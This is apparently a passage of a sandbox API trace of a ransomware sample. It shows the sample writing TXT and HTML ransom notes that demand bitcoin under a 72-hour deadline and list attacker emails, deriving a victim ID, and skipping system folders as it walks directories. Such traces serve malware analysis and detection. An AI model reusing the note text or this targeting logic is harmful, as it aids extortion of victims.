	[0173.918] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*"
	[0173.919] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.920] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.920] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0173.920] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.921] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0173.921] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0173.925] CloseHandle (hObject=0x390) returned 1
	[0173.926] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.926] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0173.928] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0173.928] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.928] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0173.929] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0173.929] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0173.929] CloseHandle (hObject=0x390) returned 1
	[0173.929] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0173.930] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0173.930] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0173.930] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0173.930] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.975] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0173.975] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0173.978] CloseHandle (hObject=0x390) returned 1
	[0173.979] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0173.979] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0173.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0173.980] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0173.982] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.982] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0173.983] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.983] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.983] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0173.983] CloseHandle (hObject=0x390) returned 1
	[0173.984] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8130628c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8139e871, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.984] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*") returned 89
	[0173.984] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.985] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*") returned 0x59
	[0173.985] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.985] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.985] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.985] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.985] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.985] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.986] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.986] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.986] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.986] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.987] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.987] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.987] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.988] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.988] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.988] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.988] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.988] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.989] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.989] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.989] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.989] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.989] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.990] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0173.990] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.990] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.990] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8130628c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8139e871, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0173.990] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.990] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8132c7c6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8132c7c6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x813c4e0d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.990] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8132c7c6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8132c7c6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8132c7c6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.990] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0173.991] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0173.991] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0173.991] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov"
	[0173.991] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\"
	[0173.991] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime"
	[0173.991] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime"
	[0173.991] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\"
	[0173.991] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\"
	[0173.991] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*"
	[0173.991] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName=".", cAlternateFileName="")) returned 0xfb9370
	[0173.992] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*") returned 97
	[0173.992] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.992] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*") returned 0x61
	[0173.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0173.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0173.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0173.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.994] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0173.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.994] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0173.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.994] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.994] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0173.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0173.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0173.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0173.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0173.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0173.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0173.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
